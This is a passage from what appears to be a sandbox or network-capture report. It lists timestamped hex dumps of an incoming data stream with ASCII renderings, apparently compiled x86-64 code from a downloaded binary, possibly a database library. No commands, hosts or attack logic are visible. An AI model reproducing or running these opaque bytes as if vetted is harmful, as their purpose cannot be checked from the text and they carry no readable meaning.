48 48 8b 43 08 48 89 43 f0 e9 58 fd ff ff 48 8b 53 f0 48 85 d2 74 0c 48 8b 4d 7f 48 8b 09 e8 9b b7 06 00 48 8b 43 08 Data Ascii: HMD$0Ht$(D$ UhHCCLKDCSHMD$0HCHD$(CD$ hHCCCC3EHuECCEHCHEECC CCCCCCvHKHtHCHAHHCHCXHSHtHMHHC
2023-11-18 09:02:42 UTC	9315	IN	Data Raw: 89 83 98 00 00 00 48 8d 0c 49 48 8b 83 90 00 00 00 48 c7 04 c8 49 00 00 00 89 54 c8 08 44 89 54 c8 0c 4c 89 54 c8 10 48 63 8b 98 00 00 00 4d 39 6f 38 75 69 8b 55 7c 45 8b 40 58 ff c2 39 8b 9c 00 00 00 7f 16 44 8b ca 89 74 24 20 ba 5c 00 00 00 48 8b cb e8 cd 4d 08 00 eb 2d 8d 41 01 89 83 98 00 00 00 48 8d 0c 49 48 8b 83 90 00 00 00 c7 04 c8 5c 00 00 00 44 89 44 c8 04 89 54 c8 08 89 74 c8 0c 4c 89 54 c8 10 41 b8 02 00 00 00 8b d6 48 8b cf e8 ae 1a 00 00 45 33 d2 eb 53 39 8b 9c 00 00 00 7f 1d 44 8b ce 44 89 54 24 20 45 8b c3 ba 46 00 00 00 48 8b cb e8 69 4d 08 00 45 33 d2 eb 2e 8d 41 01 89 83 98 00 00 00 48 8d 0c 49 48 8b 83 90 00 00 00 c7 04 c8 46 00 00 00 44 89 5c c8 04 89 74 c8 08 44 89 54 c8 0c 4c 89 54 c8 10 48 63 8b 98 00 00 00 8b 55 68 39 8b 9c 00 00 Data Ascii: HIHHITDTLTHcM9o8uiU\|E@X9Dt$ \HM-AHIH\DDTtLTAHE3S9DDT$ EFHiME3.AHIHFD\tDTLTHcUh9
2023-11-18 09:02:42 UTC	9331	IN	Data Raw: 24 58 01 00 00 48 83 ce ff 4c 8d 25 ee 30 0c 00 66 0f 1f 44 00 00 48 ff c6 45 38 34 34 75 f7 48 8d 54 24 20 44 89 74 24 20 49 8b cc 81 e6 ff ff ff 3f e8 7f 88 0a 00 85 c0 75 04 44 8d 76 01 49 63 d6 49 8b cf 48 83 c2 48 e8 a8 d3 0a 00 48 8b f8 48 85 c0 74 7c 33 c0 48 89 07 48 89 47 08 48 89 47 10 48 89 47 18 48 89 47 20 48 89 47 28 48 89 47 30 48 89 47 38 48 89 47 40 48 83 c8 ff c6 07 9a 66 89 47 32 45 85 f6 75 21 8b 44 24 20 b9 00 00 00 20 85 c0 89 47 08 ba 00 00 00 10 0f 45 ca 81 c9 00 04 80 00 09 4f 04 eb 1f 48 8d 4f 48 48 89 4f 08 85 f6 74 0b 44 8b c6 49 8b d4 e8 93 28 f6 ff 48 8b 47 08 c6 04 06 00 c7 47 28 01 00 00 00 4c 8b a4 24 58 01 00 00 48 89 7b 28 4c 8b bc 24 00 01 00 00 4c 89 6b 50 48 8b 4d f0 48 33 cc e8 60 19 f6 ff 48 81 c4 08 01 00 00 41 5e Data Ascii: $XHL%0fDHE844uHT$ Dt$ I?uDvIcIHHHHt\|3HHGHGHGHG HG(HG0HG8HG@HfG2Eu!D$ GEOHOHHOtDI(HGG(L$XH{(L$LkPHMH3`HA^
2023-11-18 09:02:42 UTC	9347	IN	Data Raw: 03 00 00 00 66 41 89 45 30 41 8b c3 66 45 89 5d 2c 45 89 5d 28 89 44 24 60 4c 3b fd 0f 83 73 01 00 00 48 89 74 24 78 48 89 7c 24 20 66 66 0f 1f 84 00 00 00 00 00 41 81 44 24 38 e8 03 00 00 49 8b fb 41 88 45 10 49 8b d3 49 63 8e 5c 02 00 00 b8 01 00 00 00 85 c9 7e 22 45 8b 47 44 4c 8b c9 49 8d 8e 60 02 00 00 44 39 01 74 12 48 d1 c0 48 ff c2 48 83 c1 04 49 3b d1 7c ec 49 8b c3 49 89 45 08 49 8b f3 41 f6 47 3c 0a 49 8b 47 20 49 0f 45 f2 80 78 3f 01 75 71 4d 8d 4f 70 4c 3b cd 73 58 0f 1f 44 00 00 48 85 ff 75 07 41 f6 41 3c 0a 74 3e 49 63 8e 5c 02 00 00 b8 01 00 00 00 49 8b d3 85 c9 7e 25 45 8b 41 44 4c 8b d1 49 8d 8e 60 02 00 00 0f 1f 00 44 39 01 74 12 48 d1 c0 48 ff c2 48 83 c1 04 49 3b d2 7c ec 49 8b c3 48 0b f8 49 83 c1 70 4c 3b cd 72 ad 4c 8b c7 48 8b d6 Data Ascii: fAE0AfE],E](D$`L;sHt$xH\|$ ffAD$8IAEIIc\~"EGDLI`D9tHHHI;\|IIEIAG<IG IEx?uqMOpL;sXDHuAA<t>Ic\I~%EADLI`D9tHHHI;\|IHIpL;rLH
2023-11-18 09:02:42 UTC	9363	IN	Data Raw: 00 00 49 8b f1 4c 8b f9 48 8b 4a 20 4d 8b c8 44 8b d7 85 c0 7e 39 44 8b 46 44 48 83 c1 28 8b d0 66 0f 1f 44 00 00 44 39 41 f4 75 19 4c 85 09 75 14 0f b7 41 ec a9 ff f7 ff ff 74 09 f6 41 ea 80 75 03 41 ff c2 48 83 c1 38 48 83 ea 01 75 d7 48 8b 84 24 a0 00 00 00 8b ef 89 7c 24 20 48 85 c0 74 43 48 63 18 44 8b cf 85 db 7e 2f 4c 8b c7 48 8d 48 18 0f 1f 00 48 8b 51 f0 80 3a a6 75 1c 8b 46 44 39 42 2c 75 14 f6 01 02 75 0f 41 ff c1 49 ff c0 48 83 c1 20 4c 3b c3 7c db 44 3b cb 0f 44 eb 89 6c 24 20 49 8b 0f 49 63 f2 4c 63 ed 48 8d 5e 07 48 8d 1c 9e 4e 8d 34 ed 00 00 00 00 49 8d 1c 9e 48 85 c9 74 0d 48 8b d3 e8 27 53 0a 00 4c 8b e0 eb 5b 48 8d 43 ff 48 3d fe fe ff 7f 77 4c 39 3d 70 e6 0e 00 74 37 48 8b 0d 27 1c 0f 00 48 85 c9 74 06 ff 15 dc e6 0e 00 48 8d 54 24 28 Data Ascii: ILHJ MD~9DFDH(fDD9AuLuAtAuAH8HuH$\|$ HtCHcD~/LHHHQ:uFD9B,uuAIH L;\|D;Dl$ IIcLcH^HN4IHtH'SL[HCH=wL9=pt7H'HtHT$(
2023-11-18 09:02:42 UTC	9379	IN	Data Raw: e8 51 f3 04 00 85 c0 0f 85 ab 00 00 00 4c 8b 06 41 83 c9 ff 48 8b 17 33 c9 4d 8b 40 18 48 8b 52 18 e8 30 f3 04 00 85 c0 0f 85 8a 00 00 00 0f b7 cb 8d 41 ff 85 c1 74 13 0f b6 c3 b9 08 00 00 00 a8 18 bb 20 00 00 00 66 0f 45 d9 49 8b 06 48 8b 17 48 8b 08 48 85 d2 74 5f 48 8b 09 45 33 c9 45 33 c0 e8 3f 73 05 00 4c 8b c8 48 85 c0 74 49 44 0f b7 c3 ba 35 00 00 00 41 83 f8 02 74 18 33 c9 66 0f 1f 44 00 00 ff c1 b8 02 00 00 00 d3 e0 ff c2 44 3b c0 75 f0 41 88 11 41 b8 03 00 00 00 49 8b d1 49 8b ce e8 5c 08 00 00 44 8b c0 49 8b d6 48 8b cd e8 3e e2 ff ff 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc b8 00 04 00 00 66 39 41 14 74 09 33 c0 85 d2 48 0f 44 c1 c3 4c 8b 41 20 41 Data Ascii: QLAH3M@HR0At fEIHHHt_HE3E3?sLHtID5At3fDD;uAAII\DIH>H\$0Hl$8Ht$@H\|$HH A^f9At3HDLA A
2023-11-18 09:02:42 UTC	9395	IN	Data Raw: 41 8d 50 49 e8 1d 0e 07 00 eb 2a 8d 41 01 89 87 98 00 00 00 48 8d 0c 49 48 8b 87 90 00 00 00 48 c7 04 c8 49 00 00 00 44 89 64 c8 08 89 54 c8 0c 4c 89 4c c8 10 83 bc 24 a0 00 00 00 00 ba 26 00 00 00 b8 22 00 00 00 44 8b c6 0f 45 d0 48 8b cf e8 71 0c 07 00 48 63 9f 98 00 00 00 45 33 c0 39 9f 9c 00 00 00 7f 18 45 33 c9 44 89 44 24 20 41 8d 50 0b 48 8b cf e8 ab 0d 07 00 8b d8 eb 26 48 8d 0c 5b 8d 43 01 89 87 98 00 00 00 48 8b 87 90 00 00 00 48 c7 04 c8 0b 00 00 00 4c 89 44 c8 08 4c 89 44 c8 10 83 bc 24 a0 00 00 00 00 ba 1a 00 00 00 b8 17 00 00 00 89 6c 24 28 0f 45 d0 44 89 64 24 20 45 33 c9 44 8b c6 48 8b cf e8 a5 01 07 00 4c 8b 84 24 98 00 00 00 41 89 40 14 8b 97 98 00 00 00 85 db 79 03 8d 5a ff 48 8b 07 80 78 63 00 74 09 48 8d 05 94 9d 0e 00 eb 12 48 63 c3 Data Ascii: API*AHIHHIDdTLL$&"DEHqHcE39E3DD$ APH&H[CHHLDLD$l$(EDd$ E3DHL$A@yZHxctHHc
2023-11-18 09:02:42 UTC	9411	IN	Data Raw: 76 74 1a 3c ba 74 0d 3c 6d 74 09 4c 8d 05 7c cc 0a 00 eb a2 4c 8d 05 63 cc 0a 00 eb 99 48 85 d2 74 a5 48 c7 44 24 20 00 00 00 00 e8 16 00 00 00 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 48 89 7c 24 20 41 56 48 83 ec 30 48 8b f9 49 8b e9 48 8b 49 18 49 8b d8 4c 8b f2 48 85 c9 74 06 ff 15 5b 27 0e 00 48 8b 74 24 60 4c 8b cd 4c 8b c3 48 89 74 24 20 49 8b d6 48 8b cf e8 60 00 00 00 80 7f 63 00 75 04 33 db eb 1a 33 d2 48 8b cf e8 ac 8d 09 00 8b d8 85 c0 74 0a 48 85 f6 74 05 48 8b cd ff d6 48 8b 4f 18 48 85 c9 74 06 ff 15 1d 27 0e 00 48 8b 6c 24 48 8b c3 48 8b 5c 24 40 48 8b 74 24 50 48 8b 7c 24 58 48 83 c4 30 41 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 Data Ascii: vt<t<mtL\|LcHtHD$ H8H\$Hl$Ht$H\|$ AVH0HIHIILHt['Ht$`LLHt$ IH`cu33HtHtHHOHt'Hl$HH\$@Ht$PH\|$XH0A^H\$Hl$
2023-11-18 09:02:42 UTC	9427	IN	Data Raw: 8d 0c 49 49 8b 86 90 00 00 00 89 74 c8 04 8b 75 98 89 74 c8 0c c7 04 c8 5c 00 00 00 89 54 c8 08 4c 89 54 c8 10 33 ff 49 63 8e 98 00 00 00 41 39 8e 9c 00 00 00 7f 18 45 33 c9 89 7c 24 20 44 8b c6 49 8b ce 41 8d 51 0f e8 d9 8d 06 00 eb 32 8d 41 01 41 89 86 98 00 00 00 48 8d 0c 49 49 8b 86 90 00 00 00 c7 04 c8 0f 00 00 00 89 74 c8 04 48 c7 44 c8 08 00 00 00 00 48 89 7c c8 10 eb 02 33 ff 80 7d 80 00 0f 85 e8 00 00 00 83 7d 00 00 0f 85 e8 00 00 00 48 83 7d 18 00 0f 84 10 02 00 00 8b f7 8b 85 70 01 00 00 45 33 c9 4c 8b 85 60 01 00 00 48 8b cb 48 8b 55 18 89 44 24 30 48 8b 45 a0 48 89 44 24 28 c7 44 24 20 03 00 00 00 e8 a3 16 00 00 4c 8b 45 a0 0b f0 8b df 66 41 3b 78 36 0f 8d 5a 01 00 00 44 8b 6c 24 74 45 33 ff 44 8b 65 38 0f 1f 40 00 41 f6 40 30 20 4d 8b 58 08 Data Ascii: IItut\TLT3IcA9E3\|$ DIAQ2AAHIItHDH\|3}}H}pE3L`HHUD$0HEHD$(D$ LEfA;x6ZDl$tE3De8@A@0 MX
2023-11-18 09:02:42 UTC	9443	IN	Data Raw: ca 84 c0 74 1c 0f b6 c8 41 0f b6 01 0f b6 04 28 38 04 29 75 0c 49 ff c0 49 ff c1 85 d2 7f dc ff ca 85 d2 78 14 41 0f b6 01 0f b6 14 28 41 0f b6 00 0f b6 0c 28 3b ca 75 14 48 8d 15 c6 a6 0a 00 48 8b cf e8 ce d5 08 00 e9 db fe ff ff 41 0f b6 45 3f 8b 8c 24 f8 00 00 00 3c 02 75 37 83 f9 41 74 2e 83 f9 21 48 8d 05 c2 a6 0a 00 4c 8d 05 c3 a6 0a 00 48 8b cf 4c 0f 44 c0 4d 8d 4c 24 08 48 8d 15 b8 a6 0a 00 e8 8b d5 08 00 e9 88 fe ff ff 3c 02 74 1e 83 f9 41 75 19 4d 8d 44 24 08 48 8b cf 48 8d 15 be a6 0a 00 e8 69 d5 08 00 e9 66 fe ff ff 80 bf 14 01 00 00 02 0f 83 90 00 00 00 49 8b 55 60 48 8b cb e8 0b 04 01 00 8b 94 24 20 01 00 00 48 63 e8 48 8b 43 20 48 8b cd 48 c1 e1 05 4c 8b 3c 01 85 d2 74 06 48 8b 48 20 eb 03 49 8b cf 83 fd 01 74 04 85 d2 74 06 41 ba 05 00 00 Data Ascii: tA(8)uIIxA(A(;uHHAE?$<u7At.!HLHLDML$H<tAuMD$HHifIU`H$ HcHC HHL<tHH IttA
2023-11-18 09:02:42 UTC	9459	IN	Data Raw: 00 44 89 74 c8 04 4c 89 7c c8 08 4c 89 7c c8 10 48 8b 0f 44 38 79 63 74 14 4c 8b c5 ba fe ff ff ff e8 a0 f8 05 00 48 8b 74 24 40 eb 59 85 d2 79 08 8b 97 98 00 00 00 ff ca 48 63 c2 48 8d 0c 40 48 8b 87 90 00 00 00 44 38 7c c8 01 48 8d 14 c8 74 18 41 b9 fe ff ff ff 4c 8b c5 48 8b cf e8 43 f5 05 00 48 8b 74 24 40 eb 1c 48 8b 74 24 40 48 85 ed 74 12 48 89 6a 10 c6 42 01 fe eb 08 44 8b b4 24 a0 00 00 00 48 63 8f 98 00 00 00 8b 56 10 39 8f 9c 00 00 00 7f 19 89 54 24 20 45 8b cd ba a0 00 00 00 45 33 c0 48 8b cf e8 77 0d 06 00 eb 2a 8d 41 01 89 87 98 00 00 00 48 8d 0c 49 48 8b 87 90 00 00 00 48 c7 04 c8 a0 00 00 00 44 89 6c c8 08 89 54 c8 0c 4c 89 7c c8 10 48 8b 0f 48 8b 56 08 44 38 79 63 74 0f 4c 8b c2 ba f8 ff ff ff e8 d1 f7 05 00 eb 1f 8b 87 98 00 00 00 ff c8 Data Ascii: DtL\|L\|HD8yctLHt$@YyHcH@HD8\|HtALHCHt$@Ht$@HtHjBD$HcV9T$ EE3Hw*AHIHHDlTL\|HHVD8yctL
2023-11-18 09:02:42 UTC	9475	IN	Data Raw: 8b cc e8 4f 29 00 00 48 89 44 24 78 eb 0f b8 07 00 00 00 e9 a5 11 00 00 48 89 6c 24 78 49 89 5f 48 45 33 c0 49 8b 0c 24 48 8b d3 e8 76 ee 03 00 49 89 46 48 81 ff 86 00 00 00 75 08 44 8b ed e9 3f 01 00 00 49 8b 47 20 48 8b 8c 24 30 01 00 00 44 8b 20 8b 41 38 44 8d 68 01 ff c0 41 03 c4 44 89 6c 24 50 89 41 38 48 63 8e 98 00 00 00 39 8e 9c 00 00 00 7f 18 45 33 c0 89 6c 24 20 45 8b cd 48 8b ce 41 8d 50 46 e8 9a cd 05 00 eb 2a 8d 41 01 89 86 98 00 00 00 48 8d 0c 49 48 8b 86 90 00 00 00 48 c7 04 c8 46 00 00 00 44 89 6c c8 08 89 6c c8 0c 48 89 6c c8 10 48 8b 5c 24 58 41 b8 01 00 00 00 48 8b cb 41 8b d4 e8 a8 4f 00 00 48 89 84 24 80 00 00 00 48 85 c0 0f 84 28 01 00 00 8b dd 45 85 e4 0f 8e 91 00 00 00 48 8b b4 24 38 01 00 00 4c 8d 78 20 4c 8b f5 48 8b fd 4c 8b e8 Data Ascii: O)HD$xHl$xI_HE3I$HvIFHuD?IG H$0D A8DhADl$PA8Hc9E3l$ EHAPF*AHIHHFDllHlH\$XAHAOH$H(EH$8Lx LHL
2023-11-18 09:02:42 UTC	9491	IN	Data Raw: 48 98 48 8d 77 01 48 3b f8 7e 1d 48 85 c9 74 64 48 8b 81 60 01 00 00 48 85 c0 74 58 ff 40 30 c7 40 18 12 00 00 00 eb 4c ba 20 00 00 00 48 3b f2 0f 4f d6 39 53 20 7d 11 45 33 c0 48 8b cb e8 d3 bc 05 00 85 c0 75 2d eb 0d 48 8b 43 18 66 83 63 08 2d 48 89 43 10 48 8b 4b 10 4c 8b c6 49 8b d4 e8 f1 a8 f3 ff 0f ba f7 1f 66 89 6b 08 89 7b 0c c6 43 0a 01 48 8b 84 24 d0 00 00 00 bf 01 00 00 00 41 ff c7 49 83 c5 20 be 00 24 00 00 8d 4f ff 44 3b 38 0f 8c 8d fb ff ff 4c 8b 6c 24 78 4c 8b a4 24 80 00 00 00 48 8b bc 24 88 00 00 00 48 8b b4 24 90 00 00 00 48 8b ac 24 98 00 00 00 48 8b 9c 24 a0 00 00 00 48 81 c4 a8 00 00 00 41 5f 41 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b c4 4c 89 48 20 4c 89 40 18 48 89 50 10 55 53 48 8d 68 a9 48 81 ec 98 Data Ascii: HHwH;~HtdH`HtX@0@L H;O9S }E3Hu-HCfc-HCHKLIfk{CH$AI $OD;8Ll$xL$H$H$H$H$HA_A^HLH L@HPUSHhH
2023-11-18 09:02:42 UTC	9507	IN	Data Raw: e8 e1 83 fc ff 4c 8b 64 24 20 4d 85 f6 74 07 48 8b 45 78 49 89 06 80 bb c5 00 00 00 00 75 1a 44 8b 45 78 49 8b d7 44 0f b6 4c 24 28 45 2b c7 48 8b 4c 24 50 e8 0d 52 05 00 80 7b 63 00 74 10 be 07 00 00 00 c6 44 24 5d 00 89 74 24 58 eb 2a 8b 74 24 58 85 f6 0f 84 90 00 00 00 83 fe 65 0f 84 87 00 00 00 80 7c 24 5d 00 74 0e 48 8d 4c 24 40 e8 a1 04 00 00 8b 74 24 58 48 8b 7c 24 50 48 85 ff 74 25 8b 47 24 3d a3 0d f2 2d 74 07 3d 73 29 9c 31 75 08 48 8b cf e8 4a 09 05 00 48 8b cf e8 b2 02 05 00 8b 74 24 58 4d 85 e4 74 21 4d 8b cc 4c 8d 05 a7 5b 09 00 8b d6 48 8b cb e8 a5 d6 07 00 49 8b d4 48 8b cb e8 aa 17 08 00 eb 5b 89 73 50 85 f6 75 0a 48 83 bb a8 01 00 00 00 74 4a 8b d6 48 8b cb e8 0d d8 07 00 eb 3e 48 8b 44 24 50 48 8b 4c 24 38 48 89 01 33 c0 8b f0 89 43 50 Data Ascii: Ld$ MtHExIuDExIDL$(E+HL$PR{ctD$]t$X*t$Xe\|$]tHL$@t$XH\|$PHt%G$=-t=s)1uHJHt$XMt!ML[HIH[sPuHtJH>HD$PHL$8H3CP
2023-11-18 09:02:42 UTC	9523	IN	Data Raw: 44 24 28 89 74 24 20 e8 ca 17 01 00 44 8b 45 f0 8d 56 54 45 03 c7 89 45 b4 44 8d 4e 01 4c 89 75 a8 48 8b cb e8 2d 0c 05 00 41 0f b7 4e 60 8d 56 1f 8b 45 b4 44 8b cf 89 4c 24 28 45 8b c7 48 8b cb 89 44 24 20 e8 2c 02 05 00 4c 8d 05 25 5d 09 00 48 8b cb 8d 56 03 8b f8 e8 a8 0a 05 00 8d 56 6f c7 44 24 20 03 00 00 00 44 8d 4e 03 48 8b cb 44 8d 46 07 e8 2d 0d 05 00 4c 8d 05 fe 5c 09 00 48 8b cb 8d 56 04 e8 7b 0a 05 00 8d 56 6f c7 44 24 20 03 00 00 00 44 8d 4e 03 48 8b cb 44 8d 46 04 e8 00 0d 05 00 4d 8b 06 8d 56 04 48 8b cb e8 52 0a 05 00 8d 56 6f 89 45 c0 44 8d 4e 03 c7 44 24 20 03 00 00 00 44 8d 46 04 48 8b cb e8 d4 0c 05 00 48 8b cb e8 fc 0e 00 00 8b d7 89 45 c8 48 8b cb e8 8f fb 04 00 41 38 76 62 0f 84 1f 01 00 00 41 ff 4c 24 44 8b fe 45 8b 7c 24 44 66 41 Data Ascii: D$(t$ DEVTEEDNLuH-AN`VEDL$(EHD$ ,L%]HVVoD$ DNHDF-L\HV{VoD$ DNHDFMVHRVoEDND$ DFHHEHA8vbAL$DE\|$DfA
2023-11-18 09:02:42 UTC	9539	IN	Data Raw: ff 44 8b 4c 24 78 44 8b 94 24 80 00 00 00 4c 8b 74 24 30 41 f6 45 30 80 48 8b ac 24 88 00 00 00 0f 85 1a 01 00 00 41 80 7f 1e 00 74 04 32 d2 eb 12 45 85 e4 41 0f b6 c4 ba 20 00 00 00 0f 45 d0 80 ca 01 0f b6 c2 0c 08 83 bc 24 a8 00 00 00 00 0f b6 c8 0f b6 c2 0f 44 c8 0f b6 d1 48 8b 8c 24 98 00 00 00 0f b6 c2 0c 10 0f b6 f8 85 f6 49 63 c1 0f 44 fa 44 8b 04 81 48 63 8b 98 00 00 00 39 8b 9c 00 00 00 7f 20 8b 84 24 90 00 00 00 45 8b c8 45 8b c2 89 44 24 20 ba 7e 00 00 00 48 8b cb e8 81 cd 04 00 eb 37 8d 41 01 89 83 98 00 00 00 48 8d 0c 49 48 8b 83 90 00 00 00 c7 04 c8 7e 00 00 00 44 89 54 c8 04 44 89 44 c8 08 48 8d 14 c8 8b 84 24 90 00 00 00 4c 89 5a 10 89 42 0c 41 80 7f 1e 00 75 37 48 8b 0b 80 79 63 00 74 0f 4d 8b c5 ba fa ff ff ff e8 cb b7 04 00 eb 1f 8b 83 Data Ascii: DL$xD$Lt$0AE0H$At2EA E$DH$IcDDHc9 $EED$ ~H7AHIH~DTDDH$LZBAu7HyctM
2023-11-18 09:02:42 UTC	9555	IN	Data Raw: 12 00 00 00 e9 ef ef ff ff 48 8b b5 a8 00 00 00 48 8b bd 98 00 00 00 e9 dc ef ff ff 48 8b b5 a8 00 00 00 48 8b d8 4c 8b ad a0 00 00 00 48 8b bd 98 00 00 00 e9 bf ef ff ff 48 8b b5 a8 00 00 00 49 8b dc 4c 8b ad a0 00 00 00 48 8b bd 98 00 00 00 e9 a2 ef ff ff 4c 8b ad a0 00 00 00 48 8b bd 98 00 00 00 48 8b b5 a8 00 00 00 e9 88 ef ff ff 48 3b 9f 08 02 00 00 73 38 48 3b 9f f8 01 00 00 72 13 48 8b 87 f0 01 00 00 48 89 03 48 89 9f f0 01 00 00 eb 24 48 3b 9f 00 02 00 00 72 13 48 8b 87 e0 01 00 00 48 89 03 48 89 9f e0 01 00 00 eb 08 48 8b cb e8 fd 58 07 00 48 81 c4 48 01 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc 48 83 b9 98 00 00 00 00 0f 85 12 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 57 41 54 41 56 48 83 Data Ascii: HHHHLHHILHLHHH;s8H;rHHH$H;rHHHHXHHA_A^A]A\_^[]H@SWATAVH
2023-11-18 09:02:42 UTC	9571	IN	Data Raw: 8b cb e8 1f 4e 04 00 eb 2c 8d 41 01 89 83 98 00 00 00 48 8d 0c 49 48 8b 83 90 00 00 00 c7 04 c8 4e 00 00 00 89 54 c8 04 89 74 c8 08 89 7c c8 0c 48 89 7c c8 10 ff c6 49 83 c6 04 48 83 ed 01 0f 85 22 ff ff ff 48 8b 7c 24 40 48 8b 84 24 a0 00 00 00 49 3b 45 00 0f 85 7c 02 00 00 83 bc 24 c8 00 00 00 01 0f 85 6e 02 00 00 45 8d 6c 24 01 44 03 ab 98 00 00 00 45 85 e4 0f 8e f0 01 00 00 48 8b bc 24 b0 00 00 00 45 33 c9 48 8b 84 24 b8 00 00 00 4d 8b fc 44 8b a4 24 c0 00 00 00 45 8b f1 66 0f 1f 44 00 00 4c 8b 17 0f b7 00 41 f6 42 30 20 74 66 66 85 c0 78 61 0f bf c8 45 8b d9 45 0f b7 c1 85 c9 7e 2e 49 8b 52 08 48 83 c2 12 44 8b d9 44 8b c9 66 90 0f b7 0a 41 8d 40 01 66 83 e1 20 48 8d 52 18 66 41 0f 45 c0 44 0f b7 c0 49 83 e9 01 75 e2 49 63 c3 48 8d 0c 40 49 8b 42 08 Data Ascii: N,AHIHNTt\|H\|IH"H\|$@H$I;E\|$nEl$DEH$E3H$MD$EfDLAB0 tffxaEE~.IRHDDfA@f HRfAEDIuIcH@IB
2023-11-18 09:02:42 UTC	9585	IN	Data Raw: 66 41 3b c0 75 0c 80 79 0a 01 75 06 48 8b 79 10 eb 14 f6 c2 01 74 05 48 8b fb eb 0a b2 01 e8 0b 30 04 00 48 8b f8 48 8b 0e 0f b7 41 08 a8 24 74 05 48 8b 19 eb 21 a8 08 74 0b f2 0f 10 01 e8 2b 3e 04 00 eb 0f a8 12 74 0e 48 39 59 10 74 08 e8 da 3d 04 00 48 8b d8 4c 8b c7 48 8d 15 05 23 08 00 8b cb 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f e9 17 af 06 00 cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b 19 48 8b f1 48 8b 43 28 48 85 c0 74 08 8b b8 88 00 00 00 eb 05 bf 00 ca 9a 3b b8 00 24 00 00 66 85 43 08 75 06 83 7b 20 00 74 08 48 8b cb e8 0c 3e 04 00 48 c7 43 30 00 00 00 00 48 8d 05 2d a8 08 00 48 89 43 10 b8 02 0a 00 00 66 89 43 08 c7 43 0c 54 00 00 00 c6 43 0a 01 83 ff 54 7d 27 48 8b 43 28 48 85 c0 74 16 48 8b 80 60 01 00 00 48 Data Ascii: fA;uyuHytH0HHA$tH!t+>tH9Yt=HLH#H\$0Ht$8H _H\$Ht$WH HHHC(Ht;$fCu{ tH>HC0H-HCfCCTCT}'HC(HtH`H
2023-11-18 09:02:42 UTC	9601	IN	Data Raw: ff ff ff ff 8b 07 ff c8 48 98 48 6b c8 70 4c 89 6c 39 18 4c 89 6c 39 10 48 8b ce 49 8b 17 e8 0b 98 06 00 48 89 47 18 48 8b ce 48 8b 56 20 48 63 c3 48 c1 e0 05 48 8b 14 10 e8 f0 97 06 00 48 89 47 10 48 8b 84 24 d0 00 00 00 4c 8b cd 48 89 44 24 40 4c 8b c7 c7 44 24 38 00 00 02 00 33 d2 4c 89 64 24 30 49 8b ce 4c 89 6c 24 28 4c 89 6c 24 20 e8 08 7a fe ff 8b 94 24 d8 00 00 00 4c 8d 44 24 50 89 54 24 54 49 8b ce 48 8b d0 c6 44 24 50 0c 48 8b d8 4c 89 6c 24 58 4c 89 6c 24 68 44 89 6c 24 60 e8 76 91 fd ff 48 85 db 74 11 41 b8 01 00 00 00 48 8b d3 48 8b ce e8 f0 7b fe ff 4c 8d 9c 24 80 00 00 00 49 8b 5b 30 49 8b 6b 38 49 8b 73 40 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 45 8b d0 4c 8b c9 e8 61 00 00 00 85 c0 Data Ascii: HHkpLl9Ll9HIHGHHV HcHHHGH$LHD$@LD$83Ld$0ILl$(Ll$ z$LD$PT$TIHD$PHLl$XLl$hDl$`vHtAHH{L$I[0Ik8Is@IA_A^A]A\_H(ELa
2023-11-18 09:02:42 UTC	9617	IN	Data Raw: 07 00 e8 17 1d 06 00 e9 9a 05 00 00 8b d3 e8 8b e5 ff ff 49 8b cc e8 b3 5e 00 00 e9 86 05 00 00 49 8b 45 10 41 b9 01 00 00 00 48 85 c0 74 0c 48 8b 40 28 41 ff c1 48 85 c0 75 f4 4d 8b c2 48 8d 15 41 d2 07 00 48 8b cd e8 51 32 06 00 48 89 44 24 50 4c 8b f8 48 85 c0 0f 84 48 05 00 00 41 38 b4 24 14 01 00 00 74 03 fe 40 07 41 80 bc 24 14 01 00 00 02 73 64 48 8b 1f 48 8d 05 c6 ae 07 00 83 7c 24 40 01 4c 8d 05 6a c9 07 00 49 8b cc 48 89 5c 24 20 4c 0f 45 c0 45 33 c9 41 8d 51 12 e8 fa 84 00 00 85 c0 0f 85 fa 04 00 00 83 7c 24 40 01 ba 03 00 00 00 4d 8b 4d 00 b8 01 00 00 00 0f 45 d0 48 89 5c 24 20 4d 8b c7 49 8b cc e8 cc 84 00 00 85 c0 0f 85 cc 04 00 00 4c 8b 8c 24 50 01 00 00 48 83 cb ff 4d 85 c9 0f 85 97 00 00 00 41 0f bf 45 36 ff c8 48 98 48 8d 0c 40 49 8b 45 Data Ascii: I^IEAHtH@(AHuMHAHQ2HD$PLHHA8$t@A$sdHH\|$@LjIH\$ LEE3AQ\|$@MMEH\$ MIL$PHMAE6HH@IE
2023-11-18 09:02:42 UTC	9633	IN	Data Raw: 00 00 e8 57 70 f1 ff 44 0f b7 46 60 48 03 db 48 8b 56 08 4d 03 c0 48 89 7e 10 48 8d 3c 6f 48 8b cf e8 38 70 f1 ff 44 0f b7 46 60 48 8b 56 38 48 89 7e 08 48 03 fb 48 8b cf e8 20 70 f1 ff 83 4e 64 10 33 c0 48 89 7e 38 66 89 6e 60 eb 05 b8 07 00 00 00 48 8b 5c 24 30 48 8b 7c 24 38 48 8b 6c 24 40 48 83 c4 20 5e c3 cc cc cc cc cc cc 48 89 54 24 10 53 57 41 54 41 56 41 57 48 83 ec 40 0f bf 7a 36 45 33 e4 4c 8b 4a 08 4c 8b f2 48 8b d9 45 8b d4 85 ff 7e 43 44 8b df 0f 1f 40 00 49 8b 11 41 8b c4 44 0f b6 02 45 84 c0 74 1c 90 41 80 f8 22 8d 48 01 44 0f b6 42 01 48 8d 52 01 0f 45 c8 8d 41 01 45 84 c0 75 e5 41 83 c2 07 49 83 c1 18 44 03 d0 49 83 eb 01 75 